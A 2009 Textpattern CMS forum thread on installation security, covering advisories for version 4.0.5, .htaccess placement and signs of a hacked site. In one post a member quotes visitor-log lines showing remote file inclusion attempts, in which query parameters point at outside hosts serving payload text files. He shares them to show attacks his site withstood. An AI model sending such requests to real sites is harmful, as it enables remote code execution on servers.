Textpattern CMS

#16 2009-08-14 11:26:23

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

Els, hcgtv and Ruud, here are the sites referencing Textpatterns security bugs:

http://www.securityfocus.com/bid/27606/discuss

Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.

A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.

These issues affect Textpattern 4.0.5; other versions may also be vulnerable.

http://secunia.com/advisories/28793/

#17 2009-08-14 11:31:29

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

Mattd, you asked what was in my .htaccess file, well there are 2 htcascess files.

The one which is there upon installation, and the other one in the “myadmin” folder, which I created, is basically the security code which comes from textpatterns web page on “how to make textpattern more secure”.

The code in the latter .htaccess file is almost identical to the code that hcgtv posted, on post 14.

#18 2009-08-14 11:40:38

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

Hcgtv,

In regards to PHPxef, I take it that this is the site you got the software from:

http://phpxref.com/

Can you tell me exactly what you downloaded to view visitor logs?

It’s comforting to know that the buggy scripts that hackers use are unsuccessful in intruding into your site .

It’s just that Textpatern, which doens’t seem to be as popular as “CMS Made Simple”- sees to have had more known bugs than CMS Made Simple.

I was concerned…

#19 2009-08-14 11:50:33

iblastoff

Plugin Author

From: Toronto

Registered: 2006-06-11

Posts: 1,197

Website

Re: How to begin setup installation

sarah wrote:

It’s just that Textpatern, which doens’t seem to be as popular as “CMS Made Simple”- sees to have had more known bugs than CMS Made Simple.

i highly doubt that. did you look at cms made simples secunia statistics? it has WAY more. http://secunia.com/advisories/26928/

---

my plugins || iblastoff.ca

#20 2009-08-14 12:50:32

hcgtv

Archived Plugin Author

From: Key Largo, Florida

Registered: 2005-11-29

Posts: 2,722

Website

Re: How to begin setup installation

sarah wrote:

Can you tell me exactly what you downloaded to view visitor logs?

Textpattern has a tab in the backend that lets you see who’s visited your site.

Let me give you examples of what I see:

211.​75.​220.​49   index.​php?​c=http://​pekipug.​com/​id1.​txt?​?
131.​203.​76.​246   index.​php?​themesdir=http://​www.​edu-​math.​com/​upload_question_images/​fx29id1.​txt?
211.​75.​220.​49   index.​php?​template=http://​pekipug.​com/​id1.​txt?​?
190.​144.​44.​36   /?​page=http://​www.​freewebtown.​com/​fucku8/​fx29id1.​txt?​?
64.​202.​120.​88   /​index.​php?​page=http://​www.​oming.​com//​master-​id.​txt?

Those are just some I picked from the last hour, this kind of stuff goes on all day. If Textpattern was vulnerable, as the links you provide say, don’t you think my site would of been hacked by now?

---

We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make

#21 2009-08-14 13:11:25

PascalL

Member

From: Switzerland

Registered: 2009-03-09

Posts: 132

Website

Re: How to begin setup installation

sarah wrote:

Els, hcgtv and Ruud, here are the sites referencing Textpatterns security bugs:

http://www.securityfocus.com/bid/27606/discuss

Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.

A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.

These issues affect Textpattern 4.0.5; other versions may also be vulnerable.

http://secunia.com/advisories/28793/

thanks for the links!
In fact, these sites confirm that Textpattern is very secure! There’s been only one discovered (mild)vulnerability over the years, in Textpattern 4.0.5.

Some lists of vulnerabilities:
Textpattern
Wordpress
CMS Made Simple

As said in the disclaimer, don’t compare sortwares with the number of found vulnerabilities. The important part is the developer’s reactivity to correct them.

Last edited by PascalL (2009-08-14 13:11:57)

#22 2009-08-14 13:27:14

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

iblastoff wrote:

i highly doubt that. did you look at cms made simples secunia statistics? it has WAY more. http://secunia.com/advisories/26928/

I see…

It’s just I couldn’t find any sites referencing CMS Made Simple’s bugs when doing a google search…

#23 2009-08-14 13:32:14

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

hcgtv,

Thank you so much for the info you provided about the tab in Textpattern with the text files hackers try to input into your site!

But what does “PHPxef” do for you, and how?

Also, what are the signs that you site has been hacked?

Thanks!

#24 2009-08-14 13:42:46

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

PascalL, thanks for the links to the site you posted.

You’re right- CMS Made Simple is worse than Textpattern.

Going by the info on the links of the site you provided, these are how the vulnerabilities of “Textpattern” compare to “CMS Made Simple’s” vulnerabilities:

http://secunia.com/advisories/product/17462/?task=advisories
http://secunia.com/advisories/product/13129/?task=advisories

Textpattern: 1 Secunia advisories 3 Vulnerabilities

CMS Made Simple: 7 Secunia advisories 13 Vulnerabilities

Last edited by sarah (2009-08-14 14:14:11)

#25 2009-08-14 13:53:03

colak

Admin

From: Cyprus

Registered: 2004-11-20

Posts: 9,397

Website GitHub Mastodon Twitter

Re: How to begin setup installation

sarah,

Txp IS vulnerable to attacks like ALL software. I’ve been using it since its early beta stages and I did see sites which have been hacked successfully. A search in this forum will return such successful (or not) attempts. Such search will also reveal that a lot of the successful attacks was due to 3rd party software installed and Not due txp or its plugins. It will also reveal the serious interest of our developers regarding closing all security vulnerabilities.

Everybody here takes security seriously and I’m sure you do too BUT do you change your passwords regularly? Once a day/week/month/year? In all honesty I doubt that most people do.

Signs of hacked txp: Content not entered by user, extra code in parsed pages.

---

Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.

#26 2009-08-14 14:12:29

hcgtv

Archived Plugin Author

From: Key Largo, Florida

Registered: 2005-11-29

Posts: 2,722

Website

Re: How to begin setup installation

sarah wrote:

But what does “PHPxef” do for you, and how?

PHPXref is a resource for PHP programmers. It allows you to view the source behind Open Source projects like Textpattern.

Also, what are the signs that you site has been hacked?

The site doesn’t look the same, you notice something out of place, you can’t sign on, etc. Getting hacked takes on many variations, from a complete defacement to a nuisance link placed in a footer.

Keep in mind, as Colak points out, you’re as safe as your environment. Any other web app you may install, forums, galleries, calendars, etc., have to go through the same scrutiny as you have placed Textpattern through. On shared hosting accounts, one person getting hacked could bring others down also.

---

We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make

#27 2009-08-14 14:43:31

ruud

Developer Emeritus

From: a galaxy far far away

Registered: 2006-06-04

Posts: 5,068

Website

Re: How to begin setup installation

sarah wrote:

Els, hcgtv and Ruud, here are the sites referencing Textpatterns security bugs:

http://www.securityfocus.com/bid/27606/discuss

Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.

A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.

These issues affect Textpattern 4.0.5; other versions may also be vulnerable.

http://secunia.com/advisories/28793/

These vulnerabilities were all fixed in TXP 4.0.6 and renaming the textpattern directory wouldn’t increase security (not even by obscuring) if you were using TXP 4.0.5.
The only vulnerability that Secunia lists as not fixed is not a bug but a feature. You can use <script> tags in the body of an article. Anonymous visitors cannot publish articles.

#28 2009-08-14 18:09:58

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

colak wrote:

sarah, Txp IS vulnerable to attacks like ALL software. I’ve been using it since its early beta stages and I did see sites which have been hacked successfully. A search in this forum will return such successful (or not) attempts. Such search will also reveal that a lot of the successful attacks was due to 3rd party software installed and Not due txp or its plugins. It will also reveal the serious interest of our developers regarding closing all security vulnerabilities. Everybody here takes security seriously and I’m sure you do too BUT do you change your passwords regularly? Once a day/week/month/year? In all honesty I doubt that most people do. Signs of hacked txp: Content not entered by user, extra code in parsed pages.

Thanks for the info Colak.

Yes, my host provider advises that users change their passwords at least every 6 months, so that does increase site security.

#29 2009-08-14 18:18:02

sarah

Member

Registered: 2009-08-13

Posts: 46

Re: How to begin setup installation

HCGTV, in regards to the very helpful .htaccess code you’ve supplied for me on the previous page, one more question please:

During the installation of textpattern, once your username etc has been inputted, code is supplied for the index.php document.

Is there any way to make this even more secure?

Also, in regards to the .htaccess code you’ve supplied, may I ask where abouts exactly do I put this file?

When you install Textpattern, the folder setup you get is: textpattern 4.0.8 > textpattern>etc

Where abouts do I put the file, and do I need to delete the folder named “textpattern 4.0.8?

Thanks!

Last edited by sarah (2009-08-14 18:22:10)

#30 2009-08-14 20:10:50

hcgtv

Archived Plugin Author

From: Key Largo, Florida

Registered: 2005-11-29

Posts: 2,722

Website

Re: How to begin setup installation

sarah wrote:

Also, in regards to the .htaccess code you’ve supplied, may I ask where abouts exactly do I put this file?

The layout of a Textpattern install is:

/files
/images
/rpc
/textpattern

The .htaccess would go into /textpattern.

---

We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make